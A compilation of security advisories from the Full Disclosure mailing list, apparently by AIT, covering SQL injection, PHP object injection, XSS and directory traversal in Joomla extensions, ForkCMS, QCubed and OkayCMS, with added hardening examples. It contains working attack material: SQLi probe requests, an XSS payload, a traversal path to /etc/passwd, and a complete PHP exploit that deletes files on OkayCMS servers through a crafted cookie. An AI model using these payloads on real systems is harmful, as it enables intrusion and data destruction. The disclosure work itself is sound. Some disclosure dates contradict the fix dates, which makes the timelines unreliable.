[FD] [AIT-SA-20220208-01] SexyPolling SQL Injection

2022-04-22 Thread sec-advisory
SexyPolling SQL Injection



| Identifier: | AIT-SA-20220208-01 |
| Target: | Sexy Polling ( Joomla Extension) |
| Vendor: | 2glux |
| Version: | all versions below version 2.1.8 |
| CVE: | Not yet |
| Accessibility: | Remote |
| Severity: | Critical |
| Author: | Wolfgang Hotwagner (AIT Austrian Institute of Technology) |


Summary



[Sexy Polling is a Joomla Extension for 
votes.](https://2glux.com/projects/sexypolling). In all versions below 2.1.8 an 
unauthenticated attacker could execute arbitrary SQL commands by sending 
crafted POST-parameters to poll.php.


Vulnerability Description



In the vote.php file, the POST parameters min_date and max_date are 
insufficiently checked and sanitized. An attacker can use these parameters to 
deliver SQL injection payloads.

In lines 74 and 75 of *site/vote.php*, the parameters are assigned without 
being checked:

```php
$min_date_sended = isset($_POST['min_date']) ? $_POST['min_date'].' 00:00:00' : '';
$max_date_sended = isset($_POST['max_date']) ? $_POST['max_date'].' 23:59:59' : '';
```

These values are later concatenated, unfiltered, into the WHERE clause:

```php
$query_toal = "SELECT
COUNT(sv.`id_answer`) total_count,
MAX(sv.`date`) max_date,
MIN(sv.`date`) min_date
FROM
`#__sexy_votes` sv
JOIN
`#__sexy_answers` sa ON sa.id_poll = '$polling_id'
AND
sa.published = '1'
WHERE
sv.`id_answer` = sa.id";

//if dates are sent, add them to query
if ($min_date_sended != '' && $max_date_sended != '')
$query_toal .= " AND sv.`date` >= '$min_date_sended' AND sv.`date` <= '$max_date_sended' ";
```
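The same query with the two date parameters validated and bound instead of concatenated, added here as an example; this is not SexyPolling's code or the fix shipped in 2.1.8. It uses PDO with an in-memory SQLite fixture so it runs stand-alone; the table names follow the advisory's query without the Joomla `#__` prefix, and the `strictDate` / `countVotes` names are this example's own.

```php
<?php
// Added example, not SexyPolling's code: strict validation of the min_date /
// max_date POST parameters and a parameterised version of the vote-count
// query. Table names mirror the advisory's query without the Joomla `#__`
// prefix; the in-memory SQLite fixture is constructed for this demo and is
// not the extension's schema.
declare(strict_types=1);

/**
 * Accept only a calendar date in YYYY-MM-DD form; anything else, including the
 * lone apostrophe used in the advisory's check, is rejected and yields null.
 */
function strictDate(?string $raw): ?string
{
    if ($raw === null || !preg_match('/^\d{4}-\d{2}-\d{2}$/', $raw)) {
        return null;
    }
    $d = DateTime::createFromFormat('!Y-m-d', $raw);
    // createFromFormat silently rolls e.g. 2021-02-30 over into March; the
    // round trip catches that.
    return ($d !== false && $d->format('Y-m-d') === $raw) ? $raw : null;
}

/**
 * Vote statistics for one poll, with the optional date range bound as
 * parameters instead of being pasted into the statement text.
 */
function countVotes(PDO $db, int $pollId, ?string $minDate, ?string $maxDate): array
{
    $sql = 'SELECT COUNT(sv.id_answer) AS total_count, '
         . 'MAX(sv.`date`) AS max_date, MIN(sv.`date`) AS min_date '
         . 'FROM sexy_votes sv '
         . 'JOIN sexy_answers sa ON sa.id_poll = :poll AND sa.published = 1 '
         . 'WHERE sv.id_answer = sa.id';
    $params = [':poll' => $pollId];

    $min = strictDate($minDate);
    $max = strictDate($maxDate);
    if ($min !== null && $max !== null) {
        $sql .= ' AND sv.`date` >= :min AND sv.`date` <= :max';
        $params[':min'] = $min . ' 00:00:00';
        $params[':max'] = $max . ' 23:59:59';
    }

    $stmt = $db->prepare($sql);
    $stmt->execute($params);
    return $stmt->fetch(PDO::FETCH_ASSOC);
}

// Constructed fixture so the example runs offline.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE sexy_answers (id INTEGER, id_poll INTEGER, published INTEGER)');
$db->exec('CREATE TABLE sexy_votes (id_answer INTEGER, `date` TEXT)');
$db->exec('INSERT INTO sexy_answers VALUES (3, 1, 1)');
$db->exec("INSERT INTO sexy_votes VALUES (3, '2021-12-08 12:00:00'), (3, '2021-12-20 12:00:00')");

// In the real handler the inputs would be $_POST['min_date'] ?? null and
// $_POST['max_date'] ?? null.
$ok  = countVotes($db, 1, '2021-12-07', '2021-12-14');   // range applied: 1 vote
$bad = countVotes($db, 1, "2021-12-07'", '2021-12-14');  // date rejected: range ignored, 2 votes, no SQL error
printf("valid range -> %s vote(s), malformed date -> %s vote(s)\n",
       $ok['total_count'], $bad['total_count']);
```

The malformed value never reaches the database: it fails the format check, so the range clause is simply not added. Even if a value did reach the statement, it would travel as a bound parameter, which is what removes the injection.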

Proof Of Concept
==

To check a system for vulnerability, modify the POST request so that the 
min_date parameter contains a single apostrophe.

HTTP request:
```http
POST /components/com_sexypolling/vote.php HTTP/1.1

Host: joomla-server.local
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
HTTP_X_REAL_IP: 1.1.1.1
Content-Length: 193
Origin: joomla-server.local
Connection: close
Referer: joomla-server.local/index.php/component/search/
Cookie: 3f7d6b4d84916c70a46aaf5501d04983=iuddgl57g75v5gruopdqh0cgd6

polling_id=1_id[]=3=digits_date=2021-12-07'_date=2021-12-14_name=-_code=-_name=-_name=-_period=24=1
```

The HTTP response contains a MySQL error:

```http
HTTP/1.1 500 Internal Server Error
Date: Wed, 15 Dec 2021 10:27:40 GMT
Server: Apache/2.4.41 (Ubuntu)
Set-Cookie: PHPSESSID=39p4ql2oj0b45opsf6p105tfcf; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: sexy_poll_1=1639564060; expires=Thu, 16-Dec-2021 10:27:40 GMT; Max-Age=86400; path=/
Content-Length: 4768
Connection: close
Content-Type: application/json

Error: 1064 You have an error in your SQL syntax; check the manual that 
corresponds to your MariaDB server version for the right syntax to use near 
00:00:00 AND sv.`date` = 2021-12-14 23:59:59 
at line 12
```

Vulnerable Versions

All versions below version 2.1.8

Tested Versions
=
Sexy Polling ( Joomla Extension) 2.1.7

Impact
==
An unauthenticated attacker could inject and execute SQL commands on the 
database.

Mitigation
=
Sexy Polling 2.1.8 fixed that issue

Vendor Contact Timeline

| 2021-12-14 | Unable to find a contact of the vendor |
| 2021-12-15 | Contacting Joomla Security Strike Team |
| 2021-12-29 | Answer from the Joomla Security Strike Team that they will 
investigate the problem. |
| 2022-01-01 | Sexy Polling releases 2.1.8 |
| 2022-04-08 | Public Disclosure |

*We would like to note that the communication about this issue was weak. The 
contact-form of the maintainer of sexy_polling was broken and there was no 
other contact published. The Joomla Security Strike Team let us know that they 
will investigate, but they did not send any updates about the progress.*

Advisory URL
===
[https://www.ait.ac.at/ait-sa-20220208-01-sexypolling](https://www.ait.ac.at/ait-sa-20220208-01-sexypolling)
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/


[FD] [AIT-SA-20210215-04] CVE-2020-24036: ForkCMS PHP Object Injection

2021-03-12 Thread sec-advisory
ForkCMS PHP Object Injection
=
| Identifier: | AIT-SA-20210215-04 |
| Target: | ForkCMS |
| Vendor: | ForkCMS |
| Version: | all versions below version 5.8.3 |
| CVE: | CVE-2020-24036 |
| Accessibility: | Remote |
| Severity: | Medium |
| Author: | Wolfgang Hotwagner (AIT Austrian Institute of Technology) |

SUMMARY
=
[ForkCMS is an open source cms written in PHP.](https://www.fork-cms.com/)

VULNERABILITY DESCRIPTION

PHP object injection in the Ajax endpoint of the backend in ForkCMS below 
version 5.8.3 allows an authenticated remote user to execute malicious code.

The Ajax callbacks of the backend call unserialize() without any restriction or 
validation. An authenticated user could abuse this to inject malicious PHP 
objects, which could lead to remote code execution:

```php
$url = $this->getRequest()->request->get('url', '');
$className = $this->getRequest()->request->get('className', '');
$methodName = $this->getRequest()->request->get('methodName', '');
$parameters = $this->getRequest()->request->get('parameters', '');

// cleanup values
$parameters = unserialize($parameters); // ← VULNERABLE CODE

// fetch generated meta url
$url = urldecode($this->get('fork.repository.meta')->generateUrl($url, $className, $methodName, $parameters));

// output
$this->output(Response::HTTP_OK, $url);
}
}
```
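How the `unserialize()` call above can be closed off, as an added example rather than ForkCMS's code or the 5.8.3 fix: `allowed_classes => false` keeps any class token in the input from instantiating an object, and the result is then checked to be a plain array of scalars before it is used. `DemoSideEffect`, `decodeParameters`, `isScalarTree` and the serialized samples are constructed for this demonstration.

```php
<?php
// Added example, not ForkCMS's code: a hardened replacement for the
// unrestricted unserialize() in the Ajax callback. The class and the
// serialized samples are constructed for this demo.
declare(strict_types=1);

// Stand-in for any class with a side-effecting magic method: with a permissive
// unserialize(), its destructor runs on an injected instance.
class DemoSideEffect
{
    public string $target = '';
    public function __destruct()
    {
        echo "[destructor ran for {$this->target}]\n";
    }
}

/** True when $value is a scalar/null or an array containing only such values. */
function isScalarTree($value): bool
{
    if (is_array($value)) {
        foreach ($value as $item) {
            if (!isScalarTree($item)) {
                return false;
            }
        }
        return true;
    }
    return is_scalar($value) || $value === null;
}

/**
 * Decode a request parameter that must be a plain array of scalars.
 * No class is ever instantiated (allowed_classes => false); an object token
 * yields __PHP_Incomplete_Class, which has no methods and fails the shape
 * check, so the caller receives null instead of attacker-chosen data.
 */
function decodeParameters(string $raw): ?array
{
    $value = @unserialize($raw, ['allowed_classes' => false]);
    return (is_array($value) && isScalarTree($value)) ? $value : null;
}

// Constructed inputs.
$legit    = serialize(['slug' => 'hello-world', 'id' => 42]);
$injected = 'O:14:"DemoSideEffect":1:{s:6:"target";s:8:"demo.txt";}';

var_dump(decodeParameters($legit));     // the array, unchanged
var_dump(decodeParameters($injected));  // NULL, and no "[destructor ran ...]" line

// For contrast, the unrestricted call the advisory describes instantiates the
// class, and its destructor fires as soon as the object is released.
$obj = unserialize($injected);
unset($obj);
```

Where the parameter only ever carries simple data, replacing the PHP serialization format with JSON (`json_decode($raw, true)`) removes the object-instantiation path entirely; the `allowed_classes` option is the minimal change when the wire format cannot be altered.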

PROOF OF CONCEPT
=
In order to exploit this vulnerability, an attacker only has to be authenticated 
with the lowest privileges. We tested this exploit with "Dashboard" permissions.

For demonstration purposes we created a proof of concept exploit that deletes 
files and directories from the webserver. With more effort an attacker might 
also find a payload for executing a webshell. There are many gadgets available 
in the vendor directory for potential payloads.

The object-injection code for generating a payload might look as follows:

```
'O:27:"Swift_KeyCache_DiskKeyCache":1:{s:4:"keys";a:1:{s:%d:"%s";a:1:{s:%d:"%s";s:9:"something";}}}'
 % (len(filepath),filepath,len(deletefile),deletefile)
```

VULNERABLE VERSIONS
===
All versions including 5.8.1 are affected.

TESTED VERSIONS
===
ForkCMS 5.8.1 (with Debian 10 and PHP 7.3.14-1)

IMPACT
==
An authenticated user with minimal privileges could execute malicious code.


MITIGATION
==
Fork-5.8.3 fixed that issue

VENDOR CONTACT TIMELINE

| 2020-05-01 | Contacting the vendor |
| 2020-06-08 | Vendor replied |
| 2020-07-07 | Vendor released an updated version |
| 2021-02-15  | Public disclosure |

ADVISORY URL

[https://www.ait.ac.at/ait-sa-20210215-04-poi-forkcms](https://www.ait.ac.at/ait-sa-20210215-04-poi-forkcms)



[FD] [AIT-SA-20210215-03] CVE-2020-24912: QCube Cross-Site-Scripting

2021-03-12 Thread sec-advisory


QCube Cross-Site-Scripting
==
| Identifier: | AIT-SA-20210215-03 |
| Target: | QCubed Framework |
| Vendor: | QCubed |
| Version: | all versions including 3.1.1 |
| CVE: | CVE-2020-24912 |
| Accessibility: | Remote |
| Severity: | High |
| Author: | Wolfgang Hotwagner (AIT Austrian Institute of Technology) |

SUMMARY
===
QCubed is a PHP Model-View-Controller Rapid Application Development framework. 
(https://github.com/qcubed/qcubed)

VULNERABILITY DESCRIPTION
=
A reflected cross-site scripting (XSS) vulnerability in qcubed (all versions 
including 3.1.1) in profile.php via the stQuery-parameter allows 
unauthenticated attackers to steal sessions of authenticated users.

PROOF OF CONCEPT
=
The XSS occurs because the SQL output in profile.php is not sanitized properly. 
Since the output can be tampered with through the SQL injection 
(CVE-2020-24913), a common XSS string can easily be returned into the page.

We use the following payload (unencoded):

```
a:1:{i:0;a:3:{s:12:"objBacktrace";a:1:{s:4:"args";a:1:{i:0;s:3:"PWN";}}s:8:"strQuery";s:112:"select
 version(); select 
convert_from(decode($$PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4K$$,$$base64$$),$$utf-8$$)";s:11:"dblTimeInfo";s:1:"1";}}
```

PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4K is the base64 encoding of:

```html
<script>alert('xss')</script>
```
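Rendering the profile entries with every value HTML-escaped, as an added example (not QCubed's code or the patch in PR 1320). The entry shape follows the advisory's payload (`strQuery`, `dblTimeInfo`); the sample POST body, `parseProfile` and `renderProfile` are constructed for this demonstration, and the same escaping applies to any text a query returns.

```php
<?php
// Added example, not QCubed's code: client-supplied profile entries are decoded
// to plain arrays and every value is HTML-escaped before it reaches the page.
// The sample POST body is constructed for this demo.
declare(strict_types=1);

/** Context-correct escaping for text placed inside HTML element content. */
function esc(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

/**
 * Decode a serialized profile blob without instantiating objects and keep
 * only entries that have the expected shape.
 */
function parseProfile(string $raw): array
{
    $data = @unserialize($raw, ['allowed_classes' => false]);
    $entries = [];
    if (!is_array($data)) {
        return $entries;
    }
    foreach ($data as $entry) {
        if (is_array($entry)
            && isset($entry['strQuery'], $entry['dblTimeInfo'])
            && is_string($entry['strQuery'])
            && is_numeric($entry['dblTimeInfo'])) {
            $entries[] = [
                'strQuery'    => $entry['strQuery'],
                'dblTimeInfo' => (float) $entry['dblTimeInfo'],
            ];
        }
    }
    return $entries;
}

/** Build the HTML table; every cell goes through esc(), nothing is executed. */
function renderProfile(array $entries): string
{
    $html = "<table>\n";
    foreach ($entries as $e) {
        $html .= sprintf("<tr><td><code>%s</code></td><td>%.3f</td></tr>\n",
                         esc($e['strQuery']), $e['dblTimeInfo']);
    }
    return $html . "</table>\n";
}

// Constructed POST body: one ordinary entry and one carrying script markup.
$raw = serialize([
    ['strQuery' => 'SELECT * FROM users WHERE id = 1',  'dblTimeInfo' => '0.002'],
    ['strQuery' => "SELECT '<script>alert(1)</script>'", 'dblTimeInfo' => '1'],
]);
echo renderProfile(parseProfile($raw));
// The second row shows &lt;script&gt;alert(1)&lt;/script&gt; as text; no script runs.
```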

VULNERABLE VERSIONS
===
All versions including 3.1.1 are affected.


TESTED VERSIONS
===
QCubed 3.1.1

IMPACT
==
An unauthenticated attacker could steal sessions of authenticated users.

MITIGATION
==

QCubed delivered a patch that allows the profile functionality to be disabled 
(https://github.com/qcubed/qcubed/pull/1320/files).

VENDOR CONTACT TIMELINE
===   

| 2020-04-19 | Contacting the vendor |
| 2020-04-19 | Vendor replied |
| 2020-05-01 | Vendor released a patch at Github |
| 2021-02-15 | Public disclosure |

ADVISORY URL

[https://www.ait.ac.at/ait-sa-20210215-03-xss-qcubed](https://www.ait.ac.at/ait-sa-20210215-03-xss-qcubed)





[FD] [AIT-SA-20210215-02] CVE-2020-24913: QCubed SQL Injection

2021-03-12 Thread sec-advisory
QCubed SQL Injection
==

| Identifier: | AIT-SA-20210215-02 |
| Target: | QCubed Framework |
| Vendor: | QCubed |
| Version: | all versions including 3.1.1 |
| CVE: | CVE-2020-24913 |
| Accessibility: | Remote |
| Severity: | Critical |
| Author: | Wolfgang Hotwagner (AIT Austrian Institute of Technology) |

SUMMARY
===
QCubed is a PHP Model-View-Controller Rapid Application Development framework. 
(https://github.com/qcubed/qcubed)

VULNERABILITY DESCRIPTION
=
A SQL injection vulnerability in qcubed (all versions including 3.1.1) in 
profile.php via the strQuery parameter allows an unauthenticated attacker to 
access the database by injecting SQL code via a crafted POST request. The 
strQuery parameter of the serialized array in profile.php could lead to a 
SQL injection. This parameter is used by PrintExplainStatement, which simply 
concatenates `"EXPLAIN "` with the parameter:

```php
public function ExplainStatement($sql) {
    return $this->Query("EXPLAIN " . $sql);
}
```

This query is executed unfiltered.

We were able to write proof-of-concept exploits for MySQL and PostgreSQL. 
Unfortunately, with MySQL we were not able to use a stacked-queries payload and 
had to exploit this vulnerability with a time-based approach.
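One way to keep EXPLAIN from ever seeing client-supplied SQL, as an added example and not QCubed's code: the application records the queries it actually executed under a random handle, and a profile request may only name a handle. `QueryRegistry`, `explainRecorded` and the SQLite fixture are this example's own; a real application would keep the registry in the session.

```php
<?php
// Added example, not QCubed's code: a profiling endpoint that never EXPLAINs
// SQL supplied by the client. Queries the application itself executed are
// recorded server-side under a random handle, and profile requests may only
// refer to a handle. The registry and the SQLite fixture are constructed for
// this demo.
declare(strict_types=1);

final class QueryRegistry
{
    /** @var array<string,string> handle => SQL text */
    private array $queries = [];

    /** Called by the application's own query layer, never with request data. */
    public function record(string $sql): string
    {
        $handle = bin2hex(random_bytes(8));
        $this->queries[$handle] = $sql;
        return $handle;
    }

    public function lookup(string $handle): ?string
    {
        // Handles are 16 hex characters; anything else is rejected before lookup.
        if (!preg_match('/^[0-9a-f]{16}$/', $handle)) {
            return null;
        }
        return $this->queries[$handle] ?? null;
    }
}

/** Safe counterpart of ExplainStatement(): EXPLAIN only a recorded query. */
function explainRecorded(PDO $db, QueryRegistry $reg, string $handle): ?array
{
    $sql = $reg->lookup($handle);
    if ($sql === null) {
        return null;   // unknown or malformed handle: nothing is executed
    }
    return $db->query('EXPLAIN QUERY PLAN ' . $sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed fixture.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT)');

$reg = new QueryRegistry();
$sql = 'SELECT name FROM users WHERE id = 1';
$db->query($sql)->fetchAll();      // the application's own query ...
$handle = $reg->record($sql);      // ... is recorded under a handle

// Profile request naming a handle the server issued: the plan is returned.
printf("issued handle: %s\n",
       explainRecorded($db, $reg, $handle) === null ? 'refused' : 'explained');
// Profile request carrying raw SQL, as strQuery did: refused, never run.
printf("raw SQL:       %s\n",
       explainRecorded($db, $reg, 'select version(); select 1') === null ? 'refused' : 'explained');
```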


VULNERABLE VERSIONS
===
All versions including 3.1.1 are affected.


TESTED VERSIONS
===
QCubed 3.1.1

IMPACT
==
An unauthenticated attacker could access the database remotely. In worst-case 
scenarios an attacker might be able to execute code on the remote machine.

MITIGATION
==

QCubed delivered a patch that allows the profile functionality to be disabled 
(https://github.com/qcubed/qcubed/pull/1320/files).

VENDOR CONTACT TIMELINE
===   

| 2020-04-19 | Contacting the vendor |
| 2020-04-19 | Vendor replied |
| 2020-05-01 | Vendor released a patch at Github |
| 2021-02-15 | Public disclosure |

ADVISORY URL


[https://www.ait.ac.at/ait-sa-20210215-02-unauthenticated-sql-injection-qcubed](https://www.ait.ac.at/ait-sa-20210215-02-unauthenticated-sql-injection-qcubed)



[FD] [AIT-SA-20210215-01] CVE-2020-24914: QCubed PHP Object Injection

2021-03-12 Thread sec-advisory
QCubed PHP Object Injection
===

| Identifier: | AIT-SA-20210215-01 |
| Target: | QCubed Framework |
| Vendor: | QCubed |
| Version: | all versions including 3.1.1 |
| CVE: | CVE-2020-24914 |
| Accessibility: | Remote |
| Severity: | Critical |
| Author: | Wolfgang Hotwagner (AIT Austrian Institute of Technology) |

SUMMARY
===
QCubed is a PHP Model-View-Controller Rappid Application Development framework. 
(https://github.com/qcubed/qcubed)

VULNERABILITY DESCRIPTION
=
A PHP object injection bug in profile.php in qcubed (all versions including 
3.1.1) unserializes the untrusted data of the POST-variable "strProfileData" 
and allows an unauthenticated attacker to execute code via a crafted POST 
request.

qcubed/assets/php/profile.php:

[https://www.ait.ac.at/ait-sa-20210215-01-unauthenticated-remote-code-execution-qcubed](https://www.ait.ac.at/ait-sa-20210215-01-unauthenticated-remote-code-execution-qcubed)
 



[FD] [AIT-SA-20200301-01] CVE-2020-9364: Directory Traversal in Creative Contact Form

2020-03-06 Thread sec-advisory
# Directory Traversal in Creative Contact Form

## Overview
* Identifier: AIT-SA-20200301-01
* Target: Creative Contact Form (for Joomla)
* Vendor: Creative Solutions
* Version: 4.6.2 (before Dec 03 2019)
* CVE: CVE-2020-9364
* Accessibility: Remote
* Severity: Critical
* Author: Wolfgang Hotwagner (AIT Austrian Institute of Technology)

## Summary
[Creative Contact Form](https://creative-solutions.net/) is a responsive jQuery 
contact form for the Joomla content-management-system. 

## Vulnerability Description
A directory traversal vulnerability resides inside the mailer component of the 
Creative Contact Form for Joomla. An attacker could exploit this vulnerability 
to have arbitrary files from the server delivered by e-mail.

The vulnerable code is located in "helpers/mailer.php" at line 290:
```php
if(isset($_POST['creativecontactform_upload'])) {
    if(is_array($_POST['creativecontactform_upload'])) {
        foreach($_POST['creativecontactform_upload'] as $file) {

            // echo $file.'--';
            $file_path = JPATH_BASE . '/components/com_creativecontactform/views/creativeupload/files/'.$file;
            $attach_files[] = $file_path;
        }
    }
}
```

If an attacker puts "../../../../../../../../etc/passwd" into 
$_POST['creativecontactform_upload'] and enables "Send me a copy", the 
contact form sends the content of /etc/passwd to the attacker by e-mail.

_Note: this vulnerability might not be exploitable in the free version of 
Creative Contact Form since it does not allow "Send copy to sender"._
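The attachment loop from mailer.php with the path contained, as an added example (not Creative Contact Form's code or its Dec 2019 fix). `resolveUpload` and `collectAttachments` are this example's names, and the temporary upload directory is constructed so the script runs stand-alone.

```php
<?php
// Added example, not Creative Contact Form's code: only a bare file name is
// accepted, and the resolved path must still lie inside the upload directory.
// The temporary directory and files are constructed for this demo.
declare(strict_types=1);

/**
 * Absolute path of $name inside $uploadDir, or null if the name contains path
 * components, does not exist, or resolves (via "..", or a symlink) outside it.
 */
function resolveUpload(string $uploadDir, string $name): ?string
{
    $base = realpath($uploadDir);
    if ($base === false) {
        return null;
    }
    // Reject anything that is not a bare file name (slashes, backslashes, "..").
    if ($name === '' || $name === '.' || $name === '..' || $name !== basename($name)) {
        return null;
    }
    $path = realpath($base . DIRECTORY_SEPARATOR . $name);
    // realpath() follows symlinks, so a link pointing elsewhere fails the
    // prefix check as well.
    if ($path === false || !is_file($path)
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

/** Replacement for the loop in mailer.php: unsafe names are skipped, not attached. */
function collectAttachments(string $uploadDir, array $requested): array
{
    $files = [];
    foreach ($requested as $name) {
        $path = is_string($name) ? resolveUpload($uploadDir, $name) : null;
        if ($path !== null) {
            $files[] = $path;
        }
    }
    return $files;
}

// Constructed fixture standing in for .../views/creativeupload/files/.
$dir = sys_get_temp_dir() . '/ccf-demo-' . bin2hex(random_bytes(4));
mkdir($dir);
file_put_contents($dir . '/cv.pdf', 'demo');

// Stands in for $_POST['creativecontactform_upload'].
$requested = ['cv.pdf', '../../../../../../../../etc/passwd', 'missing.pdf'];
print_r(collectAttachments($dir, $requested)); // only <tmp>/ccf-demo-xxxx/cv.pdf

unlink($dir . '/cv.pdf');
rmdir($dir);
```

The `basename()` comparison alone already rejects the traversal string; the `realpath()` prefix check is kept so that a symlink planted inside the upload directory cannot reach outside it either.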

## Vulnerable Versions
Creative Contact Form Personal/Professional/Business 4.6.2 (before Dec 3 2019)

## Impact
An unauthenticated attacker could receive any file from the server

## Mitigation
Update to the current version

## References:
*  https://nvd.nist.gov/vuln/detail/CVE-2020-9364

## Vendor Contact Timeline

* `2019-12-02` Contacting the vendor
* `2019-12-02` Vendor published a fixed version
* `2019-03-01` Public disclosure

## Advisory URL
[https://www.ait.ac.at/ait-sa-20200301-01-directory-traversal-in-creative-contact-form](https://www.ait.ac.at/ait-sa-20200301-01-directory-traversal-in-creative-contact-form)




[FD] [AIT-SA-20191129-01] CVE-2019-16885: Unauthenticated remote code execution in OkayCMS

2019-12-06 Thread sec-advisory
# Unauthenticated remote code execution in OkayCMS

## Overview
* Identifier: AIT-SA-20191129-01
* Target: OkayCMS
* Vendor: OkayCMS
* Version: all versions including 2.3.4
* CVE: CVE-2019-16885
* Accessibility: Local
* Severity: Critical
* Author: Wolfgang Hotwagner (AIT Austrian Institute of Technology)

## Summary
[OkayCMS is a simple and functional content management system for an online 
store.](https://okay-cms.com)

## Vulnerability Description
An unauthenticated attacker can upload a webshell by injecting a malicious 
PHP object via a crafted cookie. This is possible at two places: in 
"view/ProductsView.php" via the cookie "price_filter", and in 
"api/Comparison.php" via the cookie "comparison". Both pass the untrusted cookie 
value to unserialize(). The following code shows the vulnerability in 
"api/Comparison.php":

```php
$items = !empty($_COOKIE['comparison']) ? unserialize($_COOKIE['comparison']) : array();
```

The unsafe deserialization also occurs in "view/ProductsView.php":

```php
$price_filter = unserialize($_COOKIE['price_filter']);
```
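The two cookie reads above with the cookie authenticated before it is decoded, as an added example and not OkayCMS's code: the value is JSON instead of PHP serialization and carries an HMAC, so a tampered or hand-crafted cookie is discarded without `unserialize()` ever running on it. `sealCookie`, `openCookie`, the key and the sample cookies are constructed for this demonstration.

```php
<?php
// Added example, not OkayCMS's code: cookie state is JSON (no object
// instantiation possible) and is authenticated with an HMAC before decoding.
// The key and the sample cookies are constructed for this demo; a real
// deployment keeps the key outside the web root.
declare(strict_types=1);

const COOKIE_KEY = 'constructed-demo-key-replace-me';

/** Encode state for a cookie: base64(JSON) . "." . HMAC-SHA256 over it. */
function sealCookie(array $state, string $key = COOKIE_KEY): string
{
    $payload = base64_encode(json_encode($state, JSON_THROW_ON_ERROR));
    return $payload . '.' . hash_hmac('sha256', $payload, $key);
}

/**
 * Decode a cookie produced by sealCookie(). Returns $default when the cookie
 * is absent, malformed, or its tag does not verify; the raw value is never
 * handed to unserialize().
 */
function openCookie(?string $cookie, array $default, string $key = COOKIE_KEY): array
{
    if ($cookie === null || substr_count($cookie, '.') !== 1) {
        return $default;
    }
    [$payload, $tag] = explode('.', $cookie, 2);
    if (!hash_equals(hash_hmac('sha256', $payload, $key), $tag)) {
        return $default;     // tampered or forged
    }
    $json  = base64_decode($payload, true);
    $state = $json === false ? null : json_decode($json, true);
    return is_array($state) ? $state : $default;
}

// Constructed samples standing in for $_COOKIE['comparison'].
$good     = sealCookie(['items' => [12, 7]]);
$tampered = substr($good, 0, -4) . 'zzzz';                  // damaged tag
$legacy   = 'O:6:"Smarty":1:{s:13:"cache_locking";b:1;}';   // old-style serialized object

var_dump(openCookie($good, []));       // ['items' => [12, 7]]
var_dump(openCookie($tampered, []));   // []  (default: HMAC mismatch)
var_dump(openCookie($legacy, []));     // []  (default: no tag at all)
```

Because the tag covers the whole payload, a client cannot alter the stored values either; in the comparison and price-filter cases that is a bonus, the essential property is that the server only decodes bytes it produced itself.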


## Proof of Concept
The following code utilizes an object of the smarty-component to delete 
arbitrary files from the webhost:

```php
 \n";
  exit(1);
}

$url = $argv[1];
$file = $argv[2];

class Smarty_Internal_CacheResource_File {

    public function releaseLock(Smarty $smarty, Smarty_Template_Cached $cached) {
        $cached->is_locked = false;
        @unlink($cached->lock_id);
    }
}

class Smarty_Template_Cached {
    public $handler = null;
    public $is_locked = true;
    public $lock_id = "";

    public function __construct() {
        $this->lock_id = $GLOBALS['file'];
        $this->handler = new Smarty_Internal_CacheResource_File;
    }
}

class Smarty {
    public $cache_locking = true;
}

class Smarty_Internal_Template {
    public $smarty = null;
    public $cached = null;

    public function __construct() {
        $this->smarty = new Smarty;
        $this->cached = new Smarty_Template_Cached;
    }

    public function __destruct(){
        if ($this->smarty->cache_locking && isset($this->cached) && $this->cached->is_locked) {
            $this->cached->handler->releaseLock($this->smarty, $this->cached);
        }
    }
}

$obj = new Smarty_Internal_Template();

$serialized = serialize($obj);

$un = unserialize($serialized);

$headers = [
  'Accept-Language: en-US,en;q=0.5',
  "Referer: $url/en/catalog/myagkie-igrushki",
  'Cookie: ' . 'price_filter=' . urlencode($serialized) . ';'
];

$curl = curl_init();
curl_setopt_array($curl, [
    CURLOPT_HTTPHEADER => $headers,
    CURLOPT_RETURNTRANSFER => true,
    CURLOPT_URL => "$url/en/catalog/myagkie-igrushki/sort-price",
    CURLOPT_USERAGENT => 'Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0'
]);
$resp = curl_exec($curl);
if(curl_error($curl)) {
   print curl_error($curl);
}
curl_close($curl);

print $resp;

?>
```

## Notes
Because of the high severity of this vulnerability we will not release a full 
exploit for the remote code execution.

## Vulnerable Versions
All versions of the "Lite" branch including 2.3.4. Pro versions prior to 3.0.2 
might have been affected too.

## Tested Versions
OkayCMS-Lite 2.3.4

## Impact
An unauthenticated attacker could upload a webshell to the server and execute 
commands remotely.

## Mitigation
At the moment of this publication the vendor has only patched the paid version 
of the CMS, so a change to other free software or an upgrade to the Pro version 
of OkayCMS is recommended.

## References:
*  https://nvd.nist.gov/vuln/detail/CVE-2019-16885

## Vendor Contact Timeline

* `2019-08-29` Contacting the vendor
* `2019-09-04` Vendor replied
* `2019-09-17` Vendor released commercial version 3.0.2 including a bugfix
* `2019-09-29` Public disclosure

## Advisory URL
[https://www.ait.ac.at/ait-sa-20191129-01-unauthenticated-remote-code-execution-okaycms](https://www.ait.ac.at/ait-sa-20191129-01-unauthenticated-remote-code-execution-okaycms)




[FD] [AIT-SA-20191112-01] CVE-2019-10143: Privilege Escalation via Logrotate in FreeRadius

2019-11-15 Thread sec-advisory
# Privilege Escalation via Logrotate in FreeRadius

## Overview
* Identifier: AIT-SA-20191112-01
* Target: FreeRadius
* Vendor: FreeRadius
* Version: all versions including 3.0.19
